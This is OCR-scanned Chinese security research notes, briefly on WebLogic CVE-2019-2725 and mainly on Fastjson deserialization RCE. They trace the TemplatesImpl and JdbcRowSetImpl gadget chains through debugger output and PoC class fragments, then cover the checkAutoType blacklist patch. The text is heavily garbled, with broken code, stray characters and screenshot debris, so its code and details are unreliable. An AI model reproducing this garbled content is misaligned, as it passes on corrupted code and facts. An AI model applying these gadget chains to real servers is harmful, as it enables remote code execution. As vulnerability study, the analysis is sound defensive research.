- e (ine T = diy 人 TSTTTTDUTES: "geccength(); i++) { 
if (!"in ÁREA (attributes. Lgs i) a 
wi new IllegalStateException("] ic element void:" + attributes.getQName(i)) 





f (qName.equalsIgnoreCase("array")) 


但 这 次 CVE-2019-2725 主要 是 class 标签 ，class 标签 可 代替 object 标签 来 生成 对 象 ， 因 此 这 次 
漏洞 本 质 还 是 xmldecoder 的 问题 ， 而 补丁 也 是 针对 class 标 签 来 处 理 的 。 


(qName.equalstieg: 
EllegalState 


-(qNa e, egua 
Utlegalst 





266 





267 


FastJson 反 序 列 化 学 习 
0x01 概述 


主要 是 本 次 某 * 行 动 ， 据 传闻 有 个 fastjson 的 0day， 我 就 很 好 奇 ， 刚 好 自己 之 前 没有 学 习 过 这 个 东 
西 ， 所 以 跤 着 这 个 时 间 把 这 个 学 习 一 下 。 


0x02 分 析 过 程 


什么 是 fastjson 


Fastjson 是 一 个 由 阿里 巴巴 维护 的 一 个 json 库 。 它 采用 一 种 “假定 有 序 快速 匹配 "的 算法 ， 是 号 称 Java 
中 最 快 的 json 库 。 最 早 的 通告 在 二 三 。 而 fastjson 的 用 法 可 以 先 看 看 下 面 这 个 例子 。 


先 定义 一 个 User 类 


age com.link3r.fastjson; 





pt { 
private String name; 
pr c rnt age; 
return name; 
} 
{ 
this.name = name; 
} 
pub nt { 
return age; 
} 
pub ( d { 
this.age = age; 
} 
} 
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age com.link3r.fastjson; » y 


java.util.HashMap; 

java.util.Map; 

f com.alibaba.fastjson.JSON; 

't com.alibaba.fastjson.parser.Feature; 

't com.alibaba.fastjson.serializer.SerializerFeature; 
t com.link3r.fastjson.User; 

€ class Test t { 


Static void | i | { 

tring, Object> map = new HashMap<String, Object>(); 
fey Keyi","One"); 

Bey key2", "Two"); 

j mapJson = JSON.toJSONString(map) ; 
.,out.printin(mapJson); 


= new User(); 
stUsername( "x: 
setSex( male); 
t.println(' obj name: "*useri.getClass().getName()); 





g^); 


rializedStr = JSON.toJSONString(user1); 
f.printin("serializedStr="+serializedStr) ; 


serializedStri = JSON.toJSONString(useri,SerializerFeature.WriteClassName 
wee printin("serializedStri="+serializedStr1) ; 


BEART RRINE 

= (User)JSON.parse(serializedStr1); 
-Printin(user2.getUsername()); 
:println(); 


EBObjecti ut RS FU t 

= JSON.parseObject(serializedStri); 

rintln(obj); 

t.println("obj name: "*obj.getClass().getName()* n"); 


加 | 的 是 一 个 相应 的 类 对 多 

= JSON.parseObject(serializedStri,Object.class); 
rintln(obj1); 

Println( obj 1 name: “+tobj1.getClass().getName()); 
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结果 如 下 所 示 : 


= 


{"key1" s "One" ; "key2" d "Two"? 
obj name:com.link3r.fastjson.User 










serializedStr-("Sex":"male", "Username": "xiaoming", "sex": "male", "username" : "xi 


serializedStri-("Qtype":"com.link3r.fastjson.User", "Sex" : "male", "Username" ;"y 
xiaoming 


("Username" : "xiaoming", "Sex": male", "sex" : "male", "username": "xiaoming") 
obj name:com.alibaba.fastjson.JSONObject 


com.link3r.fastjson.UserQ1b9e1916 
obj1 name:com.link3r.fastjson.User 


FastJson 利 用 toJSONString 方法 来 序列 化 对 象 ， 而 反 序 列 化 还 原 回 Object 的 方法 ， 主 要 的 AP 
两 个 ， 分 别 是 JSON.parseObject 和 JSON.parse ， 最 主要 的 区 别 就 是 前 者 返回 的 是 

JSONObject 而 后 者 返回 的 是 实际 类 型 的 对 象 ， 当 在 没有 对 应 类 的 定义 的 情况 下 ， 通 常情 况 下 都 
使 用 JSON.parseObject 来 获取 数据 。 


我 们 可 以 看 到 使 用 SerializerFeature.WriteClassName 时 会 在 序列 化 中 写 入 当前 的 type， @ty 
可 以 指定 反 序 列 化 任意 类 ， 调 用 其 set，get，is 方 法 。 而 问题 恰恰 出 现在 了 这 个 特性 ， 我 们 可 以 配 
一 些 存 在 问题 的 类 ， 然 后 继续 操作 ， 造 成 RCE 的 问题 ， 我 们 可 以 看 下 面 这 个 例子 通过 指定 @type 
， 成 功 获取 了 相关 数据 。 


package com.link3r.fastjson; 


import com.alibaba.fastjson.JSON; 
import com.alibaba.fastjson.JSONObject; 


public class 1 


public static void f 
String myJSON = "{\"@type\":\"User\", \"Username\":\"Link3r\", \"Sex 
JSONObject u3 = JSON. parseObject(myJSON); 
System.out.println("result => “ + u8.get("Username”)); 
} 
} 

结果 


result => link3r 


fastjson 1.22-1.24 


之 前 关于 这 个 漏洞 流传 的 poc 基 本 上 都 是 
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com.sun.org.apache.xalan.internal.xsitc.trax.Templatesimp 这 个 类 。 而 这 个 类 在 7u21 的 反 序 
列 化 gadget 过 程 中 ， 也 出 现 过 ， 这 样 来 看 还 是 需要 详细 跟 一 下 ， 在 反 序列 化 ， 下 面 这 行 代码 位 置 
下 个 断 点 。 


Ss . 
rname "Xia 


Object obj = JSON.parseObject(texti, Object.class, config, Feature.SupportNonPut 


ername": "Xiac 








b 
1g"} ETPA PEPER S175. DEPNIAT. PARSER. PENTIRE S iube) agit Pray eo 
Ni Variaties 
parveObjset: 302, JSON — 

b 
| ES AAP 
3 = S FN 
= ZA BEA com.alibaba.fastjson.JSON 这 个 类 中 ， 并 使 用 parser.parseobjec 来 解析 我 们 
常情 况 下 都 会 传 入 的 数据 。 


ype, @type 
我 们 可 以 配合 
指定 @type 


SS Variables 
$ 
x 


+ Y 


"class java.lang.Object" 





继续 跟 进 ， 来 到 了 com.alibaba.fastjson.parser.DefaultJSONParser 这 个 类 中 ， 


m 调用 了 
gefializer. deserialze 来 解析 传 入 的 数据 。 


derialiger.deserialze( iefaunJSONP 
oS var6)-1 


(Throwable var7) 4 
) ew JSONException(var7.getMessage(), va 


‘SISUINSONParser ^ parseObject() 


> @ config = (ParserCc 
> & dateFormatPattern 
S Variables, 
d » E this = (Defaul >» @ context = 


28)"class java.lang.Ot ^ & (3 contextArray = 


(9 fieldName = null 
token 212 9% 
derializer 
fa” & this-confi 


@ contextArrayinde» 

@ resolveTaskList = null 

@ resolveStatus.= 0 

@ extraTypeProviders = null 


com.alibaba.fastjson.parser.deserializer.JavaObjectDeserializer#deserialze 。 


isctleseriali /——— 
«T» T deserialze(DefaultJSONParser varl, Type var2, Object var3); 


t maoetFactM 
Choose Implementation of deserialze (27 methods found) 
@ CollectionCodec 
(Si ContextObjectDeserializer 
(3 EnumDeserializer 
Q FloatCodec 
[C IntegerCodec 
Maven: c 





因此 这 里 自然 继续 跟 入 之 后 会 来 到 这 个 


com,alibaba.fastjson.parser.deserializerJavaObjectDeserializer 类 中 进行 相关 操作 ， 而 这 时 
这 么 一 段 代码 。 


{ E d 


type Class && type != Object.class && type !- Serializable gq or 


这 段 代 码 又 重新 回 到 了 com.alibaba.fastjson.parser.DefaultJSONParser 这 个 类 中 ， 并 且 调 用 
parseObject 方 法 来 处 理 我 们 传 入 的 数据 。 


12: 
JSONObject object = JSONObject(lexer.isEnabled(Feature.OrderedField)) 
rseObject((Map)object, fieldName) 


JSONArrayl) 
«parseArray((Collectionjarray, (Object) fieldName) 
(lexer. isEnabled(Feature.UseObjectArray)) { 
array. toArray() 
+ 


DefaultJSONParser parse() 


ES Variables 
t 
(Ce ETT oet 
{JSONScanner@605} 


fa 


e M 


Q pos = 2225 





这 个 com.alibaba.fastjson.parser.DefaultJSONParser#parseObject 有 说 法 ， 我 们 可 以 慢 慢 来 
看 。 | 
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=} 12 & lexer.token() != 16) { 
+ lexer.te 
JSONExceptian{ e 


: fastjson:1, 


seContext context „context 
:fastjson:1, 
?fastjson:1 
‘fast}son:1 
: fastjson:1, ; 
: fast json: 


Whitespace() 
l .qetCurrent() 


> SE this = 


S= Variables 
+ 


obje 











lizable.cle 


skipWhitespace 实现 就 是 下 面 这 部 分 代码 。 


public final void { 

While(true) { 

Wiile(true) { 

af (this.ch <= yen ‘ 
uf fenas.,ch == | | ch == | | Op) os 
this. next(); 


并 且 调 用 


Continue; 


SF 


dif (this.ch == Du 
— this. skipComment () 


, 








是 便 直入 下 图 代码 中 进行 处 理 ， 
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kenName() + 


this.lexer 





首先 我 们 传 六 的 text 的 值 是 我 们 构造 好 的 payload ， 而 token 是 等 于 12， E + 
应 该 是 要 进入 值 为 12 的 选择 进行 处 理 ， 所 里 这 种 情况 下 ， 自 然 就 进入 了 最 后 一 个 else 进 行 o 


这 里 开始 会 针对 我 们 text 里 面 的 特殊 符号 进行 一 个 处 理 判断 (lexer.skipWhitespace ) ,而 
Az 





r.getCurrent( 


Aerea norcross) X texer: JSONScannergsB7 


















i. eM 
lexer.skipwhitespacel) 
ch = lexer.getCurrent() 


isObjectKey = 
Object key 
,Rarsefontext.contextR 
(ch = UR 
key = lexer.scanSymbol( .SymbolTable ) 
texer. skipwhitespace() 
ch = lexer, getCurrent!) d 
(ch t= EI a 
, JSONExcept ion{ lexer.pos() 4 * key) 


+ 





IP l tekari JS0NScanneFgs87 symbol Table? SMON Tap oo: 


= lexer.getCurrent() 
























(ch ! DES : vase 
JSONExcept ion( + lexer.pos() + + key) 
OefaultJSONParser parseObject() 
= Variables | 
| 
ES | 
bra $ 
® ct = {JSON 38} size = Q 
Go me = null 
Z texer = ‘ 
= ext = nuit 
Ws textPiag = false 
m 


on WINE La 


hm rat 


在 com.alibaba.fastjson. sob JSONLexerBase£scanSymbol 其 实 也 是 一 个 根据 特殊 符 与 进 
选择 ， 然 后 进入 相应 的 位 置 进行 处 理 的， 我 们 可 以 看 到 当前 的 chLocal 是 @ 符号 ， 


而 quote 是 ”符号 。 






String value; 
f (thasSpecial) { 


t ofset; 
if (this.np == -1) { 
offset « ð; 
} else { 


offset = this.np + 1; 
} 






value = this.addSymbol(offset, this.sp, hash, symbolTable) ; 
} else { 
value = symbolTable.addSymbol(this.sbuf, offset: @, this.sp, hash); 





由 于 我 们 的 @type 是 通过 两 个 ”闭合 这 部 分 while 循 环 一 直 凯 历 到 @type 后 面 的 “ Bie, AM 
就 进入 这 个 相等 的 ff 进行 处 理 。 


String value 
{thasSpecial) { 
offset 
np = -1) { 
offset = 9 
{ 
offset = 


{ 
np +i 


sos addSymbo offset </iis.sp hash, sSymbollahle). offset: 2 sp: 5 hash: 62688954 symbolTable:) 


tue = symbolTable.addSymbol( .Sbuf 


爱河 这 三 系列 的 处 理 之 后 ，com.alibaba.fastjson.parser.JSONLexerBasefscanSymbol 的 返回 
结果 自然 是 @type o 


= quote) { 


addSymbo l (offset symbo LTable) 


symbolTable.addSymbol( .Sp, hash) 


lexer. scanSymbol( 
5$<?> clazz = TypeUtils.1@ 


> 


ContextFlag = false 
ch =' 34 
isObiectKey = false 
ie key = ] 
& this. symbolTable = {S 
& JSON.DEFAULT TYPE KEY 
[PEUT CONTIG = TDs er 


而 根据 前 面 的 分 析 ， 我 们 知道 scanSymbol 方 法 会 遍历 " 内 的 数据 ， 当 数据 一 样 的 时 候 ， 就 会 直接 
四 value 的 结果 ， 经 过 处 理 之 后 ， 这 里 的 clazz 的 结果 自然 是 我 们 需要 的 那个 rce 的 触发 类 。 





N. DEFAULT TYPE KEY && 


exer. isEnabled(Feature.Dis xcialKeyDetect)) { 
} 
.config.getDefaultCtassLoader()) 


= null 


text = null 
ContextFlag = false 


sObjectKey = false 
> Š key = 
> = typeName 





我 们 前 面 说 过 由 于 deserialize 是 一 个 接口 ， 前 面 的 序列 化 方法 类 是 


com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer#deserialze ， 而 传 入 的 clazzz 


是 我 们 想 要 实例 化 的 一 个 利用 类 。 


ObjectDesertalizer deserializer = config.getDeserializer(clazz) gore 
thisQbj = deserializer. deserialze( clazz, fieldName); deser 
thísObj Sw KER E JANE ROS ROE sco eal ep m 





! "class com.sun.org.apache.xalan.internal.xsitc.trax. Templatesimpi" 


这 里 fi 


lexer.nextToken( > 16) 





RINA S com.alibaba.fastjson.parser.deserializer.JavaBeanDeseríalizerzideserialzexéill 


何 处 理 的 ， 进 来 之 后 ，token 是 16， 而 text 正 是 我 们 传 入 的 值 。 
JSONLexerBase lexer = (JSONLexerBase) parser. lexer; 


Wr. nextTokent p 16) 


s 


ey sr 


ParseContext context = pa 
f (object != null && conte 


context = context. parer 
} 





经 过 处 理 这 里 会 调用 


com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer#parseField 方 法 ， 





match = .parseField(parser, key, object, type, fieldValues); 


nau - MOOR ca neat en OS 


JSO! 


跟 进 这 个 方法 ， 这 个 方法 首先 会 调用 smartMatch 方 法 来 处 理 我 们 传 入 的 key 值 ， 而 这 里 的 key 值 就 是 I 
我 们 json 中 的 那些 字段 ， 比 如 : _outputProperties 、 name. _bytecodes 等 。 





TAT Was, . "d 





if (Tieldeseriatizer = && (parser. texer. c. dsEndbled thask) [[ (ohts. beanInfo. parserFeatures & mask) != @)) 1 





个 方法 的 主要 作用 是 进行 一 些 『 智 能 匹配 」， 方 便 后 续 获 取 对 应 变量 的 getter 和 setter。 调用 后 这 
MERDA TRA eq 删除 开头 的 下 划 线 等 ， 所 以 当 我 们 传 入 了  bytecodes 的 时 候 ， 实 际 
上 就 给 处 理 成 了 bytecodes ， 并 返回 对 应 的 FieldDeserializer 对 象 。 
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Fe AM clazzik 





;erialze 是 如 





S); 
的 key 值 就 是 


, Object» fie 


12 9)) { 


(fieldDeserializer == 
snakeOrkebab = { 
String key2 = 


(i= i < key. length(); ++i) ( 
ir ch, = key. charAt(i) 
f (ch == bf 
snakeOrkebab = D 
.replaceAll( 












家 于 处 理 之 后 ， 这 里 的 parseField 也 是 一 个 接口 ， 根 据 前 面 流 程 ， 这 里 的 parseField 进 入 的 是 会 调 
ficom.alibaba.fastjson.parser.deserializer.DefaultFieldDeserializer#parseField 75 ARZT X 


理 。 


Jexer.nextTokenwithColon(((FieldDeserializer)fieldDeserializer).getFastMatchToke 
((FieldDeserializer)fieldDeserializer).parseField(parser, object, objectType, fi 


return true; 





= fieldValueDeserilizer 的 对 象 是 ObjectArrayCodec ， 所 以 这 里 自然 会 进入 
com.alibaba.fastjson.serializer.ObjectArrayCodec#parseArray 。 





而 在 com.alibaba.fastjson.serializer.ObjectArrayCodec#parseArray 中 ， 所 以 这 里 又 会 调用 
om.alibaba.fastjson.serializer.ObjectArrayCodec#deserialze o 


val = ((ObjectDeserializer)deserializer).deserialze( do! 


, types ayi 


array.add(val); 





而 在 从 $ijson 在 处 理 [B 类 型 的 数组 时 ， 会 调用 lexer.bytesValue()， 其 中 的 lexer 对 应 的 内 容 就 是 
JSONScanner, 


i <T> T deserialze(DefaultJSONParser parser, Type type, Object fieldName) { 
parser. lexer; | léxok: JSON MmeOReSO38 “parser: DELAULCISON 


Class componentCla 

(type ( 

eer icArrayTy à 
ype component x r 
(component Lc > ak 

TypeVariab SOKEA e 

Type objTy O 


1f (ahitvn 


deseriaize() 





而 这 个 bytesValue() 方 法 会 自动 帮 我 们 执行 一 次 base64 解 码 。 


[] bytesvalue() { 
IOUtils.decodeBase64( .text, :np + 


然后 最 后 会 在 com.alibaba.fastjson.parser.deserializerDefaultFieldDeserializer 中 ， 通 过 


setValue 方 式 将 value 赋 值 给 我 们 要 执行 的 特殊 类 。 


ject? TemplatesImpla646 value: byte[1][]67980 


getFastMatchToken() ( 
-fieldValueDeserilizer != ? ueDeserilizer.getFastMatchToken() : 
) 


DefaultFieldDeserializer parseField() 


Variables 


t 


> Stl 


“class com.sun.org.apache.xalan.internal.xsite.trax. Templatesimp!" 
“class [[B” 


" Bytecodes" 
> & this-fieidinfo.name = 


当 处 理 OutputProperties 时 也 先 会 将 _ 去 掉 , 然 后 调用 该 属性 的 get 方 


法 : getOutputProperties() 。 


id setValue(Object object. Object value) { 
f (value {= | [this. fieldInfo. fieldClass. isPrimitive()) { 


Method method = : . fieldInfo. method 
if (method != nuit) { 
if (this. fieldInfo.getonly) { 
{this. fieldInfo. fieldClass == AtomicInteger. ) i 
AtomicInteger atomic = (AtomicInteger)method. invoke(object) 
f {atomic != null) { 
atomic, set( ( (AtomicInteger)value).get()) 
} 
} else if (t -fieldInfo. fieldClass == AtomicLong. yx 
AtomicLong atomic = (AtomicLong) method. invoke(object} 
Í (atomic t 





an atomic 


然后 回 到 用 method.invoke 通 过 反射 的 方式 实例 化 我 们 的 要 调用 的 类 。 
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/synchronissd' fava.ütil.Proper ies com.sun.org. 


et 

Collection collection = (Collection)method. invoke(object) 
{collection t= ) 
collection. addAll( (Collection) value) 


Variables 


asses = null 
outputProperties = null 


LC _sdom = {T} 
tfactory = (7 sfc 
errideDefaultParser 


ethodAccessorlmpl { 
odAccessorlmpl 








fcom.sun.org.apache.xalan.internal.xsite.trax.TemplatesimpligetOutputProperties 中 调用 
T newTransformer , 


public Sync! 


try { t 


ret : 
) urn newTransformer( ).getOutputProperties(); 


Patch (Transformerconf 


igurationException e) { 
Feturn nul] 


t 


pe com.sun.or 


g.apache.xalan.internal.xsltc.trax.Templatesimpl#newTransformer 中 调 
IetTransletinst 


ance , 


erie 


ransfor 


{ 


TransformerImpl transformer; 


transformer = TransformerImpl(getTransletInstance(),  outputProperties, 
_indentNumber,  tfactory); 


(_uriResolver != Det 
transformer.setURIResolver( uriResolver); 
} 

( tfactory.getFeature(XMLConstants.FEATURE SECURE PROCESSING)) { 
transformer .setSecureProcessing( Ji 
} 

transformer; 
} 
首先 在 


com.sun.org.apache.xalan.internal.xsltc.trax. Templatesimpl#getTransletinstance 方法 
th name 不 能 为 空 ， 然 后 这 里 会 调用 defineTransletClassess 来 处 理 传 入 的 class 对 象 。 


Transtet getTransletInstance() 
TransformerConfigurationException { 


) defineTransle 


AbstractTranslet translet = (AbstractTranslet) ci ins Let Index] . newInstance() ; 
translet.postInitialization() 
translet.setTemplates(this) 
translet.setOverrideDefaultParser(_ ov 
setAllowedProtocols(_acce 
es t= null) { 
ans let. setAuxiliaryClasses( auxi 


translet: 





在 defineTransletClassess 中 ， 这 里 会 调用 defineClass 进行 处 理 ， 我 们 可 以 看 到 这 里 解析 的 
class 的 name 正 是 我 们 POC 中 构造 的 com.ILnk3rfastjson.Test 类 。 多 
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esi Classqijg70b x: @ 


defineTransletClasses(} 









perties, 
x kaza 
ARIS eH A 309 5236 ETE 
$ com.sun.org.apache.xalan.internal.xsitc.runtime.AbstractTranslet 。 
Count; i++) { 
a defineClass( byt les [1]) 
superClass - lil.getSuperclass() 

ce 方法 
TR. 


(il .getName() 





所 以 这 也 是 为 什么 我 们 要 在 POC 构 造 的 过 程 中 继承 


comisuniorg.apache.xalan.internal.xsltc.runtime.AbstractTransiet。 


com. Link3r. fastjson; 


com. sun. org. apache. xalan. internal. xsltc. DOM; 
com. sun. org. apache. xalan.internal.xsltc.TransletException; 
com. sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 
-om. sun. org. apache. xml. internal.dtm.DTMAxisIterator; 
Sun. org. apache. xml. internal.serializer.SerializationHandler; 


AbstractTranslet { 
IOException { 





:里 解析 的 





Fewnstance ， 实 力 化 我 们 的 传 入 解析 的 那个 dlass 对 象 。 





: 1 AbstractTransiet) 
mplatesimp! getTransietinstance() 


= Variables 
t 


be” ame = 


“class com.}ink3r.fastjson.Test” 


= null 
€ newinstar 


e = null 
> @name = 


然后 自然 就 可 以 rce 了 。 


tmpConstructor AAA nooo tmpConstruc 
vocati- " s 


"sn pul Tas ETSOP. Test) 
Unsafe. getUns tmpConstructor 


"class com.link3r.fastison. Test" | * 


newinstanc 





这 是 一 个 调用 链 。 
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+ Class tijas 347, Runtime (java.lang) » p. 

5:13, Test (com.link3r.fastjson) 

Bincee:-1, NativeConstructorAccessorImpl (sun.reflect) 

tance: 62, NativeConstructorAccessorImpl (sun.reflect) 

stance:45, DelegatingConstructorAccessorImpl (sun.reflect) 

Bence: 423, Constructor (java.lang.reflect) 

stance:442, Class (java.lang) 

nsietinstance:455, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc. 
insformer : 486, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax) 
rputProperties:507, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc. 
0:-1, NativeMethodAccessorImpl (sun.reflect) 

e:62, NativeMethodAccessorImpl (sun.reflect) 

0:43, DelegatingMethodAccessorImpl (sun.reflect) 

::498, Method (java.lang.reflect) 

FfatjSón. Tes lue:80, FieldDeserializer (com.alibaba.fastjson.parser.deserializer) 
jeld:83, DefaultFieldDeserializer (com.alibaba.fastjson.parser.deserialize 
ield:722, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer) 
alze:568, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer) 
12e :187, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer) 
alze:183, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer) 
bject:368, DefaultJSONParser (com.alibaba.fastjson.parser) 

13 7, DefaultJSONParser (com.alibaba.fastjson.parser) 

e:45, JavaObjectDeserializer (com.alibaba.fastjson.parser.deserializer) 
ect:639, DefaultJSONParser (com.alibaba.fastjson.parser) 

ect:339, JSON (com.alibaba.fastjson) 

ect:302, JSON (com.alibaba.fastjson) 

OTypeDeny:44, Poc (com.link3r.fastjson) 

| Poc (com.1ink3r.fastjson) 
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3 8 getExternalextensio: 





_bytecodes 而 生成 类 的 实例 ， 再 者 因为 传 进去 的 参数 都 会 经 过 key. replaceall("\ w. 
处 理 ， 所 以 使 用 OutputProperties 参数 最 终 会 调用 getoutputProperties() 方法 进 
面 的 利用 链 。 


关于 FastJson 的 解析 过 程 分 析 


package com.link3r.fastjson; 


import java.util.Properties; 


public String name; 
private int age; 

private Boolean sex; 
private Properties prop; 


public { 
System.out.println("User()"); 

} 

public void int { 
System.out.println("setAge()"); 
this,age = age; 


public Boolean { 
System. out.println("getSex()"); 
return this.sex; 


public Properties ( 
System.out.println("getProp()"); 
return this.prop; 


public String { 


String s = "[User Object] name=" + this.name + ", age=" + this.age + ' 


return S; 
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com.link3r.fastjson; 


package 

import com.alibaba.fastjson. JSON; 
public cla { 

public stat { 


String eneity3 = 
Object obj = JSON.parseObject(eneity3, Person.class); 
system.out .println(obj); 


} 
} 


输出 结果 如 下 : 


User() 

setAge( ) 

getProp() 

[User Object] name-Tom, age-13, prop-null, sex-null 


我 们 可 以 看 到 


publiciíetRBgname1& Fr 514r, 

privatef£ihBjage 反 序 列 化 成 功 ”setter 通 数 被 调用 
Piayvate 修 饰 的 sex 未 被 反 序列 化 ”getter 水 数 没有 被 调用 
pmivate 修 饰 的 prop 没有 被 反 序列 化 但 是 get ter 函 数 被 调用 


这 里 的 SEX 与 prop 都 为 private 变 量 ， 且 都 无 setter 方 法 ， 但 是 prop 的 getter 函 数 被 调用 ，sex 的 没有 ， 
所 以 我 们 看 看 源码 ， 核 心 在 com.alibaba.fastjson.util.JavaBeanInfo ， 该 类 会 区 分 情况 进行 处 
至 纪 会 将 满足 条 件 的 方法 添加 到 fieldList 列 表 当 中 供 后 面 的 反 序列 化 操作 进行 调用 。 


method. getName 


4 && !Modifier. isStatic(method.getModifiers()) && (method. getReturnType().equals(Void.T 


on( JSONField. 


tion = TypeUtils.getSuperMethodAnnotation(clazz, method) 


{annotation != )( 
{!annotation.deserialize()) 1 


ordinal = annotation. ordinal() 


alzeFeatures = SerializerFeature. of (annotation. serialzeFeatures({)) 


annotation.name(). Length() [ 

methodName = annotation.name() 

add(fieldList FieldInfo(methodName, method, (Field) 
» 


LEITET 


h c3 = methodName.charAt(3 


clazz, type, ordinal, serialzeFeatur¢ 





方法 名 长 度 大 于 4 且 以 set 开 头 
非 静态 函数 

返回 类 型 为 void 或 当前 类 

参数 个 数 为 1 个 


满足 条 件 的 getter: 





方法 名 长 度 大 于 等 于 4 

非 静 态 方法 

以 get 开 头 县 第 4 个 字母 为 大 写 

无 参数 

返回 值 类 型 继承 自 Collection Map AtomicBoolean AtomicInteger AtomicLong 


我 们 上 面 例子 中 的 getProp() 返回 类 型 为 properties ,而 Properties extends 
Hashtable , 而 Hashtable implements Map ， 所 以 getProp() 会 被 调用 而 getsex() XB, 
那么 当 该 get 方 法 中 存在 一 些 危 险 操 作 的 调用 链 ， 就 会 造成 任意 命令 执行 。 
f (Map. .isAssignableFrom(method.getReturnType()]) { 
—— —— PB 


FieldDeseríalizer setVaiue() 


nk3r.fastjson.Person.get 


补丁 中 增加 了 checkAutoType 构 造 方法 ， 并 且 限 制 了 黑 名 单 和 白 名 单 。 


public Class<?> checkAutoType(String typeName, Class<?> expectClass) { 
if (typeName == null) { 
return null; 


final String cl r3 typeName.replace('$', '.'); 


if CautoTypeSupport |! expectClass != null) { 
0; i < acceptLlist ++i) 1 
ceptlistii]; e 
:startsWith(accept)) { 


peUtils. Loadclass(typename, defaultClassLoader); 





+ typeName); 






















a.lang. Thread 
j,net .Socket 


.bcel 

.commons.beanutils, 
.commons.collections.Transformer, 
.commons.collections.functors, 
.commons.collections4.comparators, 
.commons . fileupload, 
,myfaces.context.servlet, 

.tomcat, 

.Wicket.util, 

codehaus .groovy.runtime, 


x0 S, 


hibernate, 
rasti son.P: y 


lozilla.javascript, 
ython.core, org. springframework 


.Sun.org.apache.xalan.internal.xsltc.trax.TemplatesImp 这 个 利用 链 ， 默 认 情 况 
会 反 序列 化 public 的 方法 和 属性 ， 而 我 们 构造 的 PoC 中 有 private 的 成 员 变 
odes 和 name , 为 了 给 这 些 变量 赋值 ， 则 必须 要 服务 端 开 启 了 SupportNonPublicField 


起 Pastjson 反 序列 化 jsonStr 时 : 
ONStr) 构造 方法 +]son 字 符 串 指定 属性 的 setter ( )+ 特 殊 的 get ter ( ) 


t(jsonstr) 构造 方法 +Json 字 符 串 指定 属性 的 setter( )+ 所 有 getter() 包括 不 存在 属性 和 
ect (jsonstr,*.class) 构造 方法 rJson 字 符 串 指定 属性 的 setter ( )+ 特 殊 的 getter( ) 


[OwSet . JdbcRowSet Impl; 


j 
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首先 经 过 补丁 修复 之 后 ， 会 在 com.alibaba.fastjson.parser.DefaultJSONParser 中 调用 
checkAutoType 来 检查 我 们 传 入 的 类 是 不 是 在 黑 名 单 中 ， 我 们 构造 的 这 个 类 自然 不 在 这 个 黑 名 间 


中 ， 所 以 自然 就 过 了 这 部 分 的 检测 。 


{i expectClass != 
-acceptList. length 
eptList [mask] 
tartsWith(accept)) 4 d 
ypeUtils. loadClass{typeName 
) i 


(className. startsWith(acces pt) && Typeutíl 
JSONException( + typeName) 


上 面 一 系列 流程 跟 完 之 后 ， 会 进入 到 这 么 一 行 代码 


(clazz == ied 
clazz = TypeUtils.loadClass(typeName, .defaultClassLoader, 
} 


而 loadClass 方 法 的 作用 是 将 开头 的 L 和 结尾 的 ; 去除 。 





(className. charAt(@) == 

Class<?> componentType = loadClass(className.substrin 
Array. newLnstance(componentType 
(className. startswWith(".") && classNa 
newClassName = classi 


Wioadt lass 


(classloader != nui!) { 
clazz = classloader. loadClass (className) 
f (cache) { 
mappings.put(className, clazz); 


n t 
ypeUtils. loadC lass (typeName is.defaultClassLoader 


f (Typebtils. getAn station Y 
urn clazz;| 


ypeName = lexer. ScanSymbotf tf ,symbolTable, ) 
texer. isEnabled(Feature. YánoreAutóType]) 1 


[Te exer. isenab led dt PATEAT ETIE MEETRIT "C 
t 


strValue i 

Class clazz; z: ^4 am. sun. rowset ting 

if (object & object. getClass{).getName{).equals(typeName)) { 
lazz = object.getClass() z 


$. config, checkAutoType(typeName, (Class)nuil, lexer.getFeatures()) 


DefaultiSONParser parseObject() 


然后 核心 的 处 理 流程 其 实 和 之 前 的 实例 化 这 个 类 的 过 程 一 样 。 










\ java Tang, THREAD)" avan 


qu 






















PIS FI 


setAutoCommit :4067, JdbcRowSetImpl (com.sun.rowset) 
在 这 个 黑 名 音 


invoked: -1, NativeMethodAccessorImpl (sun.reflect) 

invoke: 62, NativeMethodAccessorImpl (sun.reflect) 

jnvoke:43, DelegatingMethodAccessorImpl (sun.reflect) 

jnvoke:498, Method (java.lang.reflect) 

'setValue:96, FieldDeserializer (com.alibaba.fastjson.parser.deserializer) 

^ deserialze:742, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer) 
 parseRest :1240, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer) 
- deserialze:-1, FastjsonASMDeserializer 1 JdbcRowSetImpl (com.alibaba.fastjson.pe 
- deserialze:267, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer) 


Tag HERR, Javan, 


parseobject : 370, DefaultJSONParser (com.alibaba.fastjson.parser) 
parse:1335, DefaultJSONParser (com.alibaba.fastjson.parser) 





parse:1301, DefaultJSONParser (com.alibaba.fastjson.parser) 
parse:152, JSON (com.alibaba.fastjson) 

parse:162, JSON (com.alibaba.fastjson) 

parse:131, JSON (com.alibaba.fastjson) 
testJdbcRowSetImpl:17, OtherPOC (com.link3r.fastjson) 
main:9, OtherPOC (com.link3r.fastjson) 


E oa > 


这 里 我 关心 的 是 为 什么 com.sun.rowset.JdbcRowSetImpl 这 个 方法 能 够 导致 触发 RCE 的 问题 ， 
传 六 dataSourceName , 先 调用 其 setter 方 法 。 


ourceName(String varl) tí 4$ SQLException { 
aSourceName() != Ku 

-getDataSourceName()}.equals(var1)) { 

-SetDataSourceName(var1) 

„conn = 

ps = 

PS = 

{ 
-setDataSourceName(var1) 


了 autoCommit:true ， 所 以 反 序 列 化 时 会 调用 setAutoCommit() 。 


| setAutoCommit (b n var1) throws SQLException 1 
«conn != null) { 
conn. setAutoCommit(vari);| + 


connect() 
mita 


3 ect 方法 ， 这 里 的 getDataSoureceName 返 回 的 是 dataSource， 因 此 结果 自然 是 我 们 传 入 的 
ource, 


atContextaz30 


2.getConnectí .getusername(), 


oString{)} 


.geturt{) .getUsername() -getPassword(Y). s 





V1.2.42 





补丁 
补丁 中 采用 黑 名 单 的 方式 来 deny 类 。 


thJavaBear ypeut 





然后 移 除 开头 的 L 和 结尾 的 ; 


